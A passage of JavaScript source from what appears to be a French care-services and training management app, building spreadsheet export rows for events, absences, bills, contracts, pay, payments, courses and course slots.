      ? auxiliaries.find(aux => aux._id.toHexString() === event.auxiliary.toHexString())
      : null;
    const auxiliarySector = auxiliary ? getMatchingSector(auxiliary.sectorHistory, event) : null;
    // First history entries that time-stamped the start/end hours, if any.
    const startHourTimeStamping = event.histories.find(history => get(history, 'update.startHour'));
    const endHourTimeStamping = event.histories.find(history => get(history, 'update.endHour'));
    const cells = [
      EVENT_TYPE_LIST[event.type],
      get(event, 'internalHour.name', ''),
      event.subscription ? getServiceName(event.subscription.service) : '',
      // Time-stamped start/end take precedence over the scheduled dates.
      displayDate('update.startHour.from', startHourTimeStamping, event.startDate),
      displayDate('update.startHour.to', startHourTimeStamping),
      TIMESTAMPING_ACTION_TYPE_LIST[get(startHourTimeStamping, 'action')] || '',
      get(startHourTimeStamping, 'action') === MANUAL_TIME_STAMPING
        ? MANUAL_TIME_STAMPING_REASONS[get(startHourTimeStamping, 'manualTimeStampingReason')] : '',
      displayDate('update.endHour.from', endHourTimeStamping, event.endDate),
      displayDate('update.endHour.to', endHourTimeStamping),
      TIMESTAMPING_ACTION_TYPE_LIST[get(endHourTimeStamping, 'action')] || '',
      get(endHourTimeStamping, 'action') === MANUAL_TIME_STAMPING
        ? MANUAL_TIME_STAMPING_REASONS[get(endHourTimeStamping, 'manualTimeStampingReason')] : '',
      UtilsHelper.formatFloatForExport(CompaniDate(event.endDate).diff(event.startDate, 'hours', true).hours),
      repetition || '',
      event.kmDuringEvent ? UtilsHelper.formatFloatForExport(event.kmDuringEvent) : '',
      EVENT_TRANSPORT_MODE_LIST[get(event, 'transportMode')] || '',
      // Prefer the event's own sector; fall back to the auxiliary's sector.
      get(event, 'sector.name') || get(auxiliarySector, 'sector.name') || '',
      get(auxiliary, '_id') || '',
      CIVILITY_LIST[get(auxiliary, 'identity.title')] || '',
      get(auxiliary, 'identity.firstname', ''),
      get(auxiliary, 'identity.lastname', '').toUpperCase(),
      event.auxiliary ? 'Non' : 'Oui',
      get(event, 'customer._id', ''),
      CIVILITY_LIST[get(event, 'customer.identity.title')] || '',
      get(event, 'customer.identity.lastname', '').toUpperCase(),
      get(event, 'customer.identity.firstname', ''),
      event.misc || '',
      event.isBilled ? 'Oui' : 'Non',
      event.isCancelled ? 'Oui' : 'Non',
      CANCELLATION_CONDITION_LIST[get(event, 'cancel.condition')] || '',
      CANCELLATION_REASON_LIST[get(event, 'cancel.reason')] || '',
    ];
    rows.push(cells);
  }
  return rows;
};
// Column headers (first row) of the auxiliary-absence history export.
// Order must match the cells produced by exports.formatAbsence below.
const absenceExportHeader = [
  'Id Auxiliaire',
  'Auxiliaire - Prénom',
  'Auxiliaire - Nom',
  'Auxiliaire - Titre',
  'Équipe',
  'Type',
  'Nature',
  'Début',
  'Fin',
  'Equivalent heures contrat',
  'Prolongation',
  'Absence d\'origine',
  'Divers',
];
exports.formatAbsence = (absence) => {
const hours = DraftPayHelper.getAbsenceHours(absence, absence.auxiliary.contracts);
const datetimeFormat = absence.absenceNature === HOURLY ? 'dd/LL/yyyy HH:mm' : 'dd/LL/yyyy';
return [
get(absence, 'auxiliary._id') || '',
get(absence, 'auxiliary.identity.firstname', ''),
get(absence, 'auxiliary.identity.lastname', '').toUpperCase(),
CIVILITY_LIST[get(absence, 'auxiliary.identity.title')] || '',
get(absence, 'auxiliary.sector.name') || '',
ABSENCE_TYPE_LIST[absence.absence],
ABSENCE_NATURE_LIST[absence.absenceNature],
CompaniDate(absence.startDate).format(datetimeFormat),
CompaniDate(absence.endDate).format(datetimeFormat),
UtilsHelper.formatFloatForExport(hours),
absence.extension ? 'oui' : 'non',
absence.extension ? CompaniDate(absence.extension.startDate).format(datetimeFormat) : '',
absence.misc || '',
];
};
/**
 * Exports absence history between two dates as an array of rows (header first).
 * Absences spanning several months are split into one row per month so that
 * downstream analytics can aggregate monthly.
 * @param {Date|string} start - beginning of the export period
 * @param {Date|string} end - end of the export period
 * @param {Object} credentials - logged user's credentials (company scoping)
 * @returns {Promise<Array<Array>>} header row followed by one row per absence chunk
 */
exports.exportAbsencesHistory = async (start, end, credentials) => {
  const events = await EventRepository.getAbsencesForExport(start, end, credentials);
  const rows = [absenceExportHeader];
  for (const event of events) {
    const absenceIsOnOneMonth = CompaniDate(event.startDate).isSame(event.endDate, 'month');
    if (absenceIsOnOneMonth) rows.push(exports.formatAbsence(event));
    else { // split absence by month to ease analytics
      // First chunk: from the real start date to the end of its month.
      rows.push(exports.formatAbsence({ ...event, endDate: CompaniDate(event.startDate).endOf('month').toISO() }));
      // Whole months between start and end (presumably truncated, not rounded,
      // by CompaniDate#diff — TODO confirm).
      const monthsDiff = CompaniDate(event.endDate).diff(event.startDate, 'months').months;
      // Middle chunks: one calendar month each, end clamped to the real end date.
      for (let i = 1; i <= monthsDiff; i++) {
        const endOfMonth = CompaniDate(event.startDate).add({ months: i }).endOf('month').toISO();
        rows.push(exports.formatAbsence({
          ...event,
          endDate: CompaniDate(event.endDate).isBefore(endOfMonth) ? event.endDate : endOfMonth,
          startDate: CompaniDate(event.startDate).add({ months: i }).startOf('month').toISO(),
        }));
      }
      // Trailing chunk: if the absence ends after the last month covered above,
      // emit a final row from the start of the following month to the real end.
      if (CompaniDate(event.startDate).add({ months: monthsDiff }).endOf('month').isBefore(event.endDate)) {
        rows.push(exports.formatAbsence({
          ...event,
          endDate: event.endDate,
          startDate: CompaniDate(event.startDate).add({ months: monthsDiff + 1 }).startOf('month').toISO(),
        }));
      }
    }
  }
  return rows;
};
// Column headers (first row) shared by the bill ("Facture") and credit note
// ("Avoir") rows of the billing history export.
const billAndCreditNoteExportHeader = [
  'Nature',
  'Identifiant',
  'Date',
  'Id Bénéficiaire',
  'Titre',
  'Nom',
  'Prénom',
  'Id tiers payeur',
  'Tiers payeur',
  'Montant HT en €',
  'Montant TTC en €',
  'Nombre d\'heures',
  'Services',
  'Date de création',
];
/**
 * Renders a bill's subscriptions as one "name - hours - price TTC" line each,
 * joined by CRLF (multi-line cell in the export).
 * @param {Object} bill - bill whose subscriptions should be summarised
 * @returns {string} empty string when the bill has no subscriptions
 */
const exportBillSubscriptions = (bill) => {
  if (!bill.subscriptions) return '';

  const lines = [];
  for (const subscription of bill.subscriptions) {
    const formattedHours = UtilsHelper.formatHour(subscription.hours);
    const formattedPrice = UtilsHelper.formatPrice(subscription.inclTaxes);
    lines.push(`${subscription.service.name} - ${formattedHours} - ${formattedPrice} TTC`);
  }

  return lines.join('\r\n');
};
/**
 * Builds the cells shared by bill and credit-note export rows:
 * number, date, customer id, civility, upper-cased lastname, firstname.
 * @param {Object} document - a bill or credit note with populated customer identity
 * @returns {Array<string>} the common cells, in export column order
 */
const formatRowCommonsForExport = (document) => {
  const identity = get(document, 'customer.identity') || {};
  const customerId = get(document.customer, '_id');

  return [
    document.number || '',
    document.date ? CompaniDate(document.date).format('dd/LL/yyyy') : '',
    customerId ? customerId.toHexString() : '',
    CIVILITY_LIST[identity.title] || '',
    (identity.lastname || '').toUpperCase(),
    identity.firstname || '',
  ];
};
/**
 * Formats bills as "Facture" export rows, totalling hours and pre-tax amounts
 * (with per-line discounts applied) across subscriptions and billing items.
 * @param {Array<Object>} bills - bills with populated customer and third-party payer
 * @returns {Array<Array>} one cells array per bill
 */
const formatBillsForExport = (bills) => bills.map((bill) => {
  let totalHours = 0;
  let totalExclTaxes = 0;

  // NumbersHelper keeps monetary additions free of binary floating-point drift.
  for (const subscription of bill.subscriptions || []) {
    const exclTaxesWithDiscount = UtilsHelper
      .computeExclTaxesWithDiscount(subscription.exclTaxes, subscription.discount, subscription.vat);
    totalExclTaxes = NumbersHelper.add(totalExclTaxes, exclTaxesWithDiscount);
    totalHours = NumbersHelper.add(totalHours, subscription.hours);
  }
  for (const billingItem of bill.billingItemList || []) {
    const exclTaxesWithDiscount = UtilsHelper
      .computeExclTaxesWithDiscount(billingItem.exclTaxes, billingItem.discount, billingItem.vat);
    totalExclTaxes = NumbersHelper.add(totalExclTaxes, exclTaxesWithDiscount);
  }

  const tppId = get(bill.thirdPartyPayer, '_id');
  const createdAt = get(bill, 'createdAt', null);

  return [
    'Facture',
    ...formatRowCommonsForExport(bill),
    tppId ? tppId.toHexString() : '',
    get(bill.thirdPartyPayer, 'name') || '',
    UtilsHelper.formatFloatForExport(totalExclTaxes),
    UtilsHelper.formatFloatForExport(bill.netInclTaxes),
    UtilsHelper.formatFloatForExport(totalHours),
    exportBillSubscriptions(bill),
    createdAt ? CompaniDate(createdAt).format('dd/LL/yyyy') : '',
  ];
});
/**
 * Formats credit notes as "Avoir" export rows.
 * @param {Array<Object>} creditNotes - credit notes with populated customer and third-party payer
 * @returns {Array<Array>} one cells array per credit note
 */
const formatCreditNotesForExport = (creditNotes) => {
  const rows = [];
  for (const creditNote of creditNotes) {
    // Sum customer and third-party-payer amounts through NumbersHelper, as
    // formatBillsForExport does, instead of raw `+` which is subject to binary
    // floating-point drift on monetary values.
    const totalExclTaxes = NumbersHelper.add(creditNote.exclTaxesCustomer || 0, creditNote.exclTaxesTpp || 0);
    const totalInclTaxes = NumbersHelper.add(creditNote.inclTaxesCustomer || 0, creditNote.inclTaxesTpp || 0);
    const tppId = get(creditNote.thirdPartyPayer, '_id');
    const createdAt = get(creditNote, 'createdAt', null);
    const cells = [
      'Avoir',
      ...formatRowCommonsForExport(creditNote),
      tppId ? tppId.toHexString() : '',
      get(creditNote.thirdPartyPayer, 'name') || '',
      UtilsHelper.formatFloatForExport(totalExclTaxes),
      UtilsHelper.formatFloatForExport(totalInclTaxes),
      '', // credit notes carry no hours column
      get(creditNote, 'subscription.service.name') || '',
      createdAt ? CompaniDate(createdAt).format('dd/LL/yyyy') : '',
    ];
    rows.push(cells);
  }
  return rows;
};
exports.exportBillsAndCreditNotesHistory = async (startDate, endDate, credentials) => {
const query = { date: { $lte: endDate, $gte: startDate }, company: get(credentials, 'company._id') };
const bills = await Bill.find(query)
.sort({ date: 'desc' })
.populate({ path: 'customer', select: 'identity' })
.populate({ path: 'thirdPartyPayer' })
.lean();
const creditNotes = await CreditNote.find(query)
.sort({ date: 'desc' })
.populate({ path: 'customer', select: 'identity' })
.populate({ path: 'thirdPartyPayer' })
.lean();
return [billAndCreditNoteExportHeader, ...formatBillsForExport(bills), ...formatCreditNotesForExport(creditNotes)];
};
// Column headers (first row) of the contract/amendment history export.
const contractExportHeader = [
  'Type',
  'Id Auxiliaire',
  'Titre',
  'Prénom',
  'Nom',
  'Date de début',
  'Date de fin',
  'Taux horaire',
  'Volume horaire hebdomadaire',
];
exports.exportContractHistory = async (startDate, endDate, credentials) => {
const query = { company: get(credentials, 'company._id'), 'versions.startDate': { $lte: endDate, $gte: startDate } };
const contracts = await Contract.find(query).populate({ path: 'user', select: 'identity' }).lean();
const rows = [contractExportHeader];
for (const contract of contracts) {
const identity = get(contract, 'user.identity') || {};
for (let i = 0, l = contract.versions.length; i < l; i++) {
const version = contract.versions[i];
if (version.startDate && CompaniDate(version.startDate).isSameOrBetween(startDate, endDate)) {
rows.push([
i === 0 ? 'Contrat' : 'Avenant',
get(contract, 'user._id') || '',
CIVILITY_LIST[identity.title] || '',
identity.firstname || '',
identity.lastname || '',
version.startDate ? CompaniDate(version.startDate).format('dd/LL/yyyy') : '',
version.endDate ? CompaniDate(version.endDate).format('dd/LL/yyyy') : '',
UtilsHelper.formatFloatForExport(version.grossHourlyRate),
version.weeklyHours || '',
]);
}
}
}
return rows;
};
// Column headers (first row) of the pay / final pay history export.
// Order must match the cells built in exports.exportPayAndFinalPayHistory.
const payExportHeader = [
  'Id Auxiliaire',
  'Titre',
  'Prénom',
  'Nom',
  'Equipe',
  'Date d\'embauche',
  'Début',
  'Date de notif',
  'Motif',
  'Fin',
  'Heures contrat',
  'Heures absences',
  'Heures à travailler',
  'Heures travaillées',
  'Dont exo non majo',
  'Dont exo et majo',
  'Détails des majo exo',
  'Dont non exo et non majo',
  'Dont non exo et majo',
  'Détails des majo non exo',
  'Heures transports',
  'Solde heures',
  'Dont diff mois précédent',
  'Compteur',
  'Heures sup à payer',
  'Heures comp à payer',
  'Mutuelle',
  'Remboursement transport',
  'Km payés',
  'Km parcourus',
  'Frais téléphoniques',
  'Prime',
  'Indemnité',
];
/**
 * Returns the auxiliary's hiring date: the start date of their earliest contract.
 * @param {Array<Object>|null|undefined} contracts - the auxiliary's contracts
 * @returns {*} earliest contract startDate, or null when there is no contract
 */
const getHiringDate = (contracts) => {
  if (!contracts || contracts.length === 0) return null;
  if (contracts.length === 1) return contracts[0].startDate;

  // Sort a copy chronologically (Array#sort mutates) and take the first.
  const chronological = [...contracts].sort(DatesHelper.ascendingSort('startDate'));
  return chronological[0].startDate;
};
/**
 * Renders the surcharges of one surcharge plan as a CRLF-joined multi-line
 * string: plan name first, then one "label, pct%, hours h" line per surcharge.
 * @param {Object} surchargedPlanDetails - surcharge amounts keyed by surcharge type
 * @param {string} planName - label used as the first line
 * @returns {string|null} null when the plan has no known surcharge key
 */
const formatLines = (surchargedPlanDetails, planName) => {
  const relevantSurcharges = Object.entries(pick(surchargedPlanDetails, Object.keys(SURCHARGES)));
  if (!relevantSurcharges.length) return null;

  const lines = [planName];
  relevantSurcharges.forEach(([surchargeKey, surcharge]) => {
    const formattedHours = UtilsHelper.formatFloatForExport(surcharge.hours);
    lines.push(`${SURCHARGES[surchargeKey]}, ${surcharge.percentage}%, ${formattedHours}h`);
  });

  return lines.join('\r\n');
};
exports.formatSurchargedDetailsForExport = (pay, key) => {
if (!pay || (!pay[key] && (!pay.diff || !pay.diff[key]))) return '';
const formattedPlans = [];
if (pay[key]) {
for (const surchargedPlanDetails of pay[key]) {
const lines = formatLines(surchargedPlanDetails, surchargedPlanDetails.planName);
if (lines) formattedPlans.push(lines);
}
}
if (pay.diff && pay.diff[key]) {
for (const surchargedPlanDetails of pay.diff[key]) {
const lines = formatLines(surchargedPlanDetails, `${surchargedPlanDetails.planName} (M-1)`);
if (lines) formattedPlans.push(lines);
}
}
return formattedPlans.join('\r\n\r\n');
};
exports.formatHoursWithDiff = (pay, key) =>
UtilsHelper.formatFloatForExport(UtilsHelper.computeHoursWithDiff(pay, key));
exports.exportPayAndFinalPayHistory = async (startDate, endDate, credentials) => {
const companyId = get(credentials, 'company._id', null);
const query = {
endDate: { $lte: CompaniDate(endDate).endOf('month').toDate() },
startDate: { $gte: CompaniDate(startDate).startOf('month').toDate() },
company: companyId,
};
const pays = await Pay.find(query)
.sort({ startDate: 'desc' })
.populate({
path: 'auxiliary',
select: 'identity sector contracts',
populate: [
{ path: 'sector', select: '_id sector', match: { company: get(credentials, 'company._id', null) } },
{ path: 'contracts' },
],
})
.lean({ autopopulate: true, virtuals: true });
const finalPays = await FinalPay.find(query)
.sort({ startDate: 'desc' })
.populate({
path: 'auxiliary',
select: 'identity sector contracts',
populate: [
{ path: 'sector', select: '_id sector', match: { company: get(credentials, 'company._id', null) } },
{ path: 'contracts' },
],
})
.lean({ autopopulate: true, virtuals: true });
const rows = [payExportHeader];
const paysAndFinalPay = [...pays, ...finalPays];
for (const pay of paysAndFinalPay) {
const hiringDate = getHiringDate(pay.auxiliary.contracts);
const cells = [
get(pay, 'auxiliary._id') || '',
CIVILITY_LIST[get(pay, 'auxiliary.identity.title')] || '',
get(pay, 'auxiliary.identity.firstname') || '',
get(pay, 'auxiliary.identity.lastname').toUpperCase() || '',
get(pay.auxiliary, 'sector.name') || '',
hiringDate ? CompaniDate(hiringDate).format('dd/LL/yyyy') : '',
CompaniDate(pay.startDate).format('dd/LL/yyyy'),
pay.endNotificationDate ? CompaniDate(pay.endNotificationDate).format('dd/LL/yyyy') : '',
pay.endReason ? END_CONTRACT_REASONS[pay.endReason] : '',
CompaniDate(pay.endDate).format('dd/LL/yyyy'),
UtilsHelper.formatFloatForExport(pay.contractHours),
exports.formatHoursWithDiff(pay, 'absencesHours'),
exports.formatHoursWithDiff(pay, 'hoursToWork'),
exports.formatHoursWithDiff(pay, 'workedHours'),
exports.formatHoursWithDiff(pay, 'notSurchargedAndExempt'),
exports.formatHoursWithDiff(pay, 'surchargedAndExempt'),
exports.formatSurchargedDetailsForExport(pay, 'surchargedAndExemptDetails'),
exports.formatHoursWithDiff(pay, 'notSurchargedAndNotExempt'),
exports.formatHoursWithDiff(pay, 'surchargedAndNotExempt'),
exports.formatSurchargedDetailsForExport(pay, 'surchargedAndNotExemptDetails'),
exports.formatHoursWithDiff(pay, 'paidTransportHours'),
exports.formatHoursWithDiff(pay, 'hoursBalance'),
get(pay, 'diff.hoursBalance') ? UtilsHelper.formatFloatForExport(pay.diff.hoursBalance) : '0,00',
UtilsHelper.formatFloatForExport(pay.hoursCounter),
UtilsHelper.formatFloatForExport(pay.overtimeHours),
UtilsHelper.formatFloatForExport(pay.additionalHours),
pay.mutual ? 'Oui' : 'Non',
UtilsHelper.formatFloatForExport(pay.transport),
UtilsHelper.formatFloatForExport(pay.paidKm),
UtilsHelper.formatFloatForExport(pay.travelledKm),
UtilsHelper.formatFloatForExport(pay.phoneFees),
UtilsHelper.formatFloatForExport(pay.bonus),
pay.compensation ? UtilsHelper.formatFloatForExport(pay.compensation) : '0,00',
];
rows.push(cells);
}
return rows;
};
// Column headers (first row) of the payments history export.
const paymentExportHeader = [
  'Nature',
  'Identifiant',
  'Date',
  'Id Bénéficiaire',
  'Titre',
  'Nom',
  'Prénom',
  'Id tiers payeur',
  'Tiers payeur',
  'Moyen de paiement',
  'Montant TTC en €',
];
exports.exportPaymentsHistory = async (startDate, endDate, credentials) => {
const query = { date: { $lte: endDate, $gte: startDate }, company: get(credentials, 'company._id') };
const payments = await Payment.find(query)
.sort({ date: 'desc' })
.populate({ path: 'customer', select: 'identity' })
.populate({ path: 'thirdPartyPayer' })
.lean();
const rows = [paymentExportHeader];
for (const payment of payments) {
const customerId = get(payment.customer, '_id');
const thirdPartyPayerId = get(payment.thirdPartyPayer, '_id');
const cells = [
PAYMENT_NATURE_LIST[payment.nature],
payment.number || '',
CompaniDate(payment.date).format('dd/LL/yyyy'),
customerId ? customerId.toHexString() : '',
CIVILITY_LIST[get(payment, 'customer.identity.title')] || '',
get(payment, 'customer.identity.lastname', '').toUpperCase(),
get(payment, 'customer.identity.firstname', ''),
thirdPartyPayerId ? thirdPartyPayerId.toHexString() : '',
get(payment.thirdPartyPayer, 'name') || '',
PAYMENT_TYPES_LIST[payment.type] || '',
UtilsHelper.formatFloatForExport(payment.netInclTaxes),
];
rows.push(cells);
}
return rows;
};
/**
 * Returns the course end for export: 'à planifier' when slots remain to plan,
 * else the end datetime of the very last slot, else ''.
 * @param {Array<Array<Object>>} slotsGroupedByDate - slots grouped per day, chronological
 * @param {Array} slotsToPlan - slots not scheduled yet
 * @returns {string}
 */
const getEndOfCourse = (slotsGroupedByDate, slotsToPlan) => {
  if (slotsToPlan.length) return 'à planifier';
  if (!slotsGroupedByDate.length) return '';

  const slotsOnLastDate = slotsGroupedByDate[slotsGroupedByDate.length - 1];
  const lastSlot = slotsOnLastDate[slotsOnLastDate.length - 1];
  return CompaniDate(lastSlot.endDate).format('dd/LL/yyyy HH:mm:ss');
};
/**
 * Returns the course start for export: the start datetime of the first slot,
 * or '' when no slot is scheduled.
 * @param {Array<Array<Object>>} slotsGroupedByDate - slots grouped per day, chronological
 * @returns {string}
 */
const getStartOfCourse = (slotsGroupedByDate) => {
  if (!slotsGroupedByDate.length) return '';

  const firstSlot = slotsGroupedByDate[0][0];
  return CompaniDate(firstSlot.startDate).format('dd/LL/yyyy HH:mm:ss');
};
/**
 * Whether a slot lies strictly inside [startDate, endDate].
 * The end-date check is short-circuited when the start check already fails.
 * @param {Object} slot - course slot with startDate/endDate
 * @param {Date|string} startDate - interval lower bound (exclusive)
 * @param {Date|string} endDate - interval upper bound (exclusive)
 * @returns {boolean}
 */
const isSlotInInterval = (slot, startDate, endDate) => {
  if (!CompaniDate(slot.startDate).isAfter(startDate)) return false;
  return CompaniDate(slot.endDate).isBefore(endDate);
};
/**
 * Exports course history: one row per course having a slot in [startDate, endDate]
 * (or an estimated start date in the interval and not archived), with attendance,
 * questionnaire, SMS and billing aggregates.
 * @param {Date|string} startDate - beginning of the export period
 * @param {Date|string} endDate - end of the export period
 * @param {Object} credentials - logged user's credentials (vendor-role scoping for bills)
 * @returns {Promise<Array<Array>>} header row + one row per course, or [[NO_DATA]]
 */
exports.exportCourseHistory = async (startDate, endDate, credentials) => {
  // Slots overlapping the interval identify the candidate courses.
  const slots = await CourseSlot.find({ startDate: { $lte: endDate }, endDate: { $gte: startDate } }).lean();
  const courseIds = slots.map(slot => slot.course);

  const courses = await Course
    .find({
      $or: [
        { _id: { $in: courseIds } },
        // Also include not-yet-planned courses expected to start in the interval.
        { estimatedStartDate: { $lte: endDate, $gte: startDate }, archivedAt: { $exists: false } },
      ],
    })
    .populate({ path: 'company', select: 'name' })
    .populate({
      path: 'subProgram',
      select: 'name steps program',
      populate: [
        { path: 'program', select: 'name' },
        {
          path: 'steps',
          select: 'type activities',
          populate: { path: 'activities', populate: { path: 'activityHistories' } },
        },
      ],
    })
    .populate({ path: 'trainer', select: 'identity' })
    .populate({ path: 'salesRepresentative', select: 'identity' })
    .populate({ path: 'contact', select: 'identity' })
    .populate({ path: 'slots', populate: 'attendances' })
    .populate({ path: 'slotsToPlan' })
    .populate({ path: 'trainees', select: 'firstMobileConnection' })
    .populate({
      path: 'bills',
      select: 'courseFundingOrganisation company billedAt',
      options: { isVendorUser: has(credentials, 'role.vendor') },
      populate: [
        { path: 'courseFundingOrganisation', select: 'name' },
        { path: 'company', select: 'name' },
        { path: 'courseCreditNote', options: { isVendorUser: !!get(credentials, 'role.vendor') }, select: '_id' },
      ],
    })
    .lean();

  // Keep courses with no slot at all (to plan) or at least one slot in the interval.
  const filteredCourses = courses
    .filter(course => !course.slots.length || course.slots.some(slot => isSlotInInterval(slot, startDate, endDate)));

  const questionnaireHistories = await QuestionnaireHistory
    .find({ course: { $in: courseIds } })
    .populate({ path: 'questionnaire', select: 'type' })
    .lean();
  const smsList = await CourseSmsHistory.find({ course: { $in: courseIds } }).lean();
  const attendanceSheetList = await AttendanceSheet.find({ course: { $in: courseIds } }).lean();

  const rows = [];
  for (const course of filteredCourses) {
    const slotsGroupedByDate = CourseHelper.groupSlotsByDate(course.slots);
    const smsCount = smsList.filter(sms => UtilsHelper.areObjectIdsEquals(sms.course, course._id)).length;
    const attendanceSheetsCount = attendanceSheetList
      .filter(attendanceSheet => UtilsHelper.areObjectIdsEquals(attendanceSheet.course, course._id))
      .length;

    // Attendances are split between subscribed trainees and walk-ins.
    const attendances = course.slots.map(slot => slot.attendances).flat();
    const courseTraineeList = course.trainees.map(trainee => trainee._id);
    const subscribedTraineesAttendancesCount = attendances
      .filter(attendance => UtilsHelper.doesArrayIncludeId(courseTraineeList, attendance.trainee))
      .length;
    const unsubscribedTraineesAttendancesCount = attendances.length - subscribedTraineesAttendancesCount;

    // Absences = expected attendances on past slots minus recorded subscribed attendances.
    const upComingSlotsCount = course.slots.filter(slot => CompaniDate().isBefore(slot.startDate)).length;
    const attendancesToCome = upComingSlotsCount * course.trainees.length;
    const absencesCount = (course.slots.length * course.trainees.length) - subscribedTraineesAttendancesCount
      - attendancesToCome;

    const unsubscribedTraineesCount = uniqBy(attendances.map(a => a.trainee), trainee => trainee.toString())
      .filter(attendanceTrainee => !UtilsHelper.doesArrayIncludeId(courseTraineeList, attendanceTrainee))
      .length;
    const pastSlotsCount = course.slots.length - upComingSlotsCount;

    const expectactionQuestionnaireAnswersCount = questionnaireHistories
      .filter(qh => qh.questionnaire.type === EXPECTATIONS)
      .filter(qh => UtilsHelper.areObjectIdsEquals(qh.course, course._id))
      .length;
    const endQuestionnaireAnswersCount = questionnaireHistories
      .filter(qh => qh.questionnaire.type === END_OF_COURSE)
      .filter(qh => UtilsHelper.areObjectIdsEquals(qh.course, course._id))
      .length;

    // eLearning progress of trainees having at least one eLearning step.
    const traineeProgressList = course.trainees
      .map(trainee => CourseHelper.getTraineeElearningProgress(trainee._id, course.subProgram.steps))
      .filter(trainee => trainee.progress.eLearning >= 0)
      .map(trainee => trainee.progress.eLearning);
    // NOTE(review): the average below divides by ALL trainees, not only those in
    // traineeProgressList — confirm this is intentional.
    const combinedElearningProgress = traineeProgressList.reduce((acc, value) => acc + value, 0);

    // Bills cancelled by a credit note are ignored for payer / billing status.
    const courseBillsWithoutCreditNote = course.bills.filter(bill => !bill.courseCreditNote);
    const payer = courseBillsWithoutCreditNote
      .map(bill => get(bill, 'courseFundingOrganisation.name') || get(bill, 'company.name'))
      .toString();
    const isBilled = courseBillsWithoutCreditNote.map(bill => (bill.billedAt ? 'Oui' : 'Non')).toString();

    rows.push({
      Identifiant: course._id,
      Type: course.type,
      Payeur: payer || '',
      Structure: course.type === INTRA ? get(course, 'company.name') : '',
      Programme: get(course, 'subProgram.program.name') || '',
      'Sous-Programme': get(course, 'subProgram.name') || '',
      'Infos complémentaires': course.misc,
      Formateur: UtilsHelper.formatIdentity(get(course, 'trainer.identity') || '', 'FL'),
      'Référent Compani': UtilsHelper.formatIdentity(get(course, 'salesRepresentative.identity') || '', 'FL'),
      'Contact pour la formation': UtilsHelper.formatIdentity(get(course, 'contact.identity') || '', 'FL'),
      'Nombre d\'inscrits': get(course, 'trainees.length'),
      'Nombre de dates': slotsGroupedByDate.length,
      'Nombre de créneaux': get(course, 'slots.length'),
      'Nombre de créneaux à planifier': get(course, 'slotsToPlan.length'),
      'Durée Totale': UtilsHelper.getTotalDurationForExport(course.slots),
      'Nombre de SMS envoyés': smsCount,
      'Nombre de personnes connectées à l\'app': course.trainees
        .filter(trainee => trainee.firstMobileConnection).length,
      'Complétion eLearning moyenne': traineeProgressList.length
        ? UtilsHelper.formatFloatForExport(combinedElearningProgress / course.trainees.length)
        : '',
      'Nombre de réponses au questionnaire de recueil des attentes': expectactionQuestionnaireAnswersCount,
      'Nombre de réponses au questionnaire de satisfaction': endQuestionnaireAnswersCount,
      'Date de démarrage souhaitée': course.estimatedStartDate
        ? CompaniDate(course.estimatedStartDate).format('dd/LL/yyyy')
        : '',
      'Début de formation': getStartOfCourse(slotsGroupedByDate),
      'Fin de formation': getEndOfCourse(slotsGroupedByDate, course.slotsToPlan),
      'Nombre de feuilles d\'émargement chargées': attendanceSheetsCount,
      'Nombre de présences': subscribedTraineesAttendancesCount,
      'Nombre d\'absences': absencesCount,
      'Nombre de stagiaires non prévus': unsubscribedTraineesCount,
      'Nombre de présences non prévues': unsubscribedTraineesAttendancesCount,
      Avancement: UtilsHelper.formatFloatForExport(pastSlotsCount / (course.slots.length + course.slotsToPlan.length)),
      Facturée: isBilled,
    });
  }
  return rows.length ? [Object.keys(rows[0]), ...rows.map(d => Object.values(d))] : [[NO_DATA]];
};
/**
 * Returns the display "address" of a course slot: the postal address for
 * on-site steps, the meeting link for remote steps, '' otherwise.
 * @param {Object} slot - course slot with populated step
 * @returns {string}
 */
const getAddress = (slot) => {
  switch (get(slot, 'step.type')) {
    case ON_SITE:
      return get(slot, 'address.fullAddress') || '';
    case REMOTE:
      return slot.meetingLink || '';
    default:
      return '';
  }
};
/**
 * Exports course slot history: one row per slot overlapping [startDate, endDate],
 * with attendance counts and the slot's step/course context.
 * @param {Date|string} startDate - beginning of the export period
 * @param {Date|string} endDate - end of the export period
 * @returns {Promise<Array<Array>>} header row + one row per slot, or [[NO_DATA]]
 */
exports.exportCourseSlotHistory = async (startDate, endDate) => {
  const courseSlots = await CourseSlot.find({ startDate: { $lte: endDate }, endDate: { $gte: startDate } })
    .populate({ path: 'step', select: 'type name' })
    .populate({
      path: 'course',
      select: 'type trainees misc subProgram company',
      populate: [
        { path: 'company', select: 'name' },
        { path: 'subProgram', select: 'program', populate: [{ path: 'program', select: 'name' }] },
      ],
    })
    .populate({ path: 'attendances' })
    .lean();

  const rows = [];
  for (const slot of courseSlots) {
    const slotDuration = UtilsHelper.getDurationForExport(slot.startDate, slot.endDate);
    // Attendances from subscribed trainees vs walk-ins.
    const subscribedTraineesAttendancesCount = slot.attendances
      .filter(attendance => UtilsHelper.doesArrayIncludeId(slot.course.trainees, attendance.trainee))
      .length;
    const unsubscribedTraineesAttendancesCount = slot.attendances.length - subscribedTraineesAttendancesCount;
    const absencesCount = slot.course.trainees.length - subscribedTraineesAttendancesCount;
    // Intra courses are prefixed with the company name.
    // NOTE(review): `slot.course.misc` may be undefined and would render as
    // "undefined" in the name — confirm misc is always set upstream.
    const courseName = get(slot, 'course.type') === INTRA
      ? `${slot.course.company.name} - ${slot.course.subProgram.program.name} - ${slot.course.misc}`
      : `${slot.course.subProgram.program.name} - ${slot.course.misc}`;

    rows.push({
      'Id Créneau': slot._id,
      'Id Formation': slot.course._id,
      Formation: courseName,
      Étape: get(slot, 'step.name') || '',
      Type: STEP_TYPES[get(slot, 'step.type')] || '',
      'Date de création': CompaniDate(slot.createdAt).format('dd/LL/yyyy HH:mm:ss') || '',
      'Date de début': CompaniDate(slot.startDate).format('dd/LL/yyyy HH:mm:ss') || '',
      'Date de fin': CompaniDate(slot.endDate).format('dd/LL/yyyy HH:mm:ss') || '',
      Durée: slotDuration,
      Adresse: getAddress(slot),
      'Nombre de présences': subscribedTraineesAttendancesCount,
      'Nombre d\'absences': absencesCount,
      'Nombre de présences non prévues': unsubscribedTraineesAttendancesCount,
    });
  }
  return rows.length ? [Object.keys(rows[0]), ...rows.map(d => Object.values(d))] : [[NO_DATA]];
};
/**
 * Exports inter-intervention transports: one row per consecutive pair of events
 * of the same auxiliary on the same day, with distance and paid duration.
 * @param {Date|string} startDate - beginning of the export period
 * @param {Date|string} endDate - end of the export period
 * @param {Object} credentials - logged user's credentials (company scoping)
 * @returns {Promise<Array<Array>>} header row + one row per transport, or [[NO_DATA]]
 */
